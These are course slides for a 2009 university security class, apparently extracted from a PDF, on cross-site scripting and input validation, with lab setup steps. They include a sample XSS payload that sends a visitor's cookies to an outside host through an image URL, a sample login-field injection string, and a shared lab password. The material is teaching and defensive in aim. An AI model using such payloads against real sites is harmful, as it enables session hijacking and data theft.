User Input Attacks CPSC 328 Spring 2009 Review Abstract lower - PDF document

User Input Attacks CPSC 328 Spring 2009 Review Abstract lower level security   Provide end-to-end security  User security info to server  WS Security  XML Encryption  XML Signature Tokens   Authentication/Authorization  SAML  XACML  SSO  Gathering System Information  Site mapping  Comments/error codes  Library/plugin vulnerabilities 1

User Input  Can not trust anything coming from user  Form data  URLs  Scripts  Must hold input as suspect until processed/cleared somehow  Let the games begin… Cross-Site Scripting  Trick some poor soul into giving you their data  Embed code into HTML  Subset of HTML injection  Can happen when server accepts data from user & sends to web browser without validation/encoding  When user connects to site, script runs  Most frequent vector: JavaScript  Outcomes  Data is sent (stolen) to another server  Web sites defaced  Control user’s browser 2

XSS: Details  Three forms  Stored, reflected, & DOM injection  Target Sites  Blogs, Forums, Forms  Anything that receives & displays info back to user  What sort of data is targeted?  Session IDs  Personal info  Anything affiliated with the current page  Can rewrite page or steal user info XSS: Tags  Some vulnerable tags  Script, html, body, img, object, applet, frame, frameset, iframe, layer, style, embed, meta, href  How compromised?  Form input stored for display  URL/link mangling (embedded script)  Web bugs to send cookie: <script> document.write(“<img src=\”http:innocent.com/bug.gif? cookie=“+document.cookie+”\””) </script> 3

Poking for Holes  Try script-ish characters in input, see what happens  <, >, /, :, ‘,  Example (misusing a text entry field): username: ‘); bad_code_here;// password:  Character encoding to hide Movie  Brackets, “script” “java”, etc Prevention  Can try to rule out all the “bad stuff”  Difficult to do  Always finding new “bad stuff”  Easier to enumerate the “good stuff”  Use different formatting tags for text entry (blogs, etc)  Encode all user-entered text 4

Prevention Details  Validate Input (before using it)  accept known good, reject bad input  Encode output (before sending to browser)  Strong encoding, do almost everything  Specify Output Encoding  Specify Document Encoding  Don’t User Blacklisting for Validation  Again, easier to whitelist than blacklist Machine Setup  Make sure sitting at machine #  4, 12, 15, 17, 19, 22, 24  Boot to Linux  Create account  Setup apache  Setup SSH 5

Create Account  Log in  User: cpsc  Passwd: cpsccpsc  Su (passwd: cpsccpsc)  Create your account  <login>: last name  password: something you can remember  useradd -c “<firstname> <lastname>” -m <login>  passwd <login>  Enter password when prompted  Logout (entirely) Config Machine  Log in as you  Kill off things you don’t need  Mail, samba, wireless, cupsd, bind, nfsd  Launch/config the following:  Apache (httpd), sshd, ntpd, mysqld  For now, just get them running in multi-user mode (run level 3 - 5)  Don’t worry about firewalls (for now) 6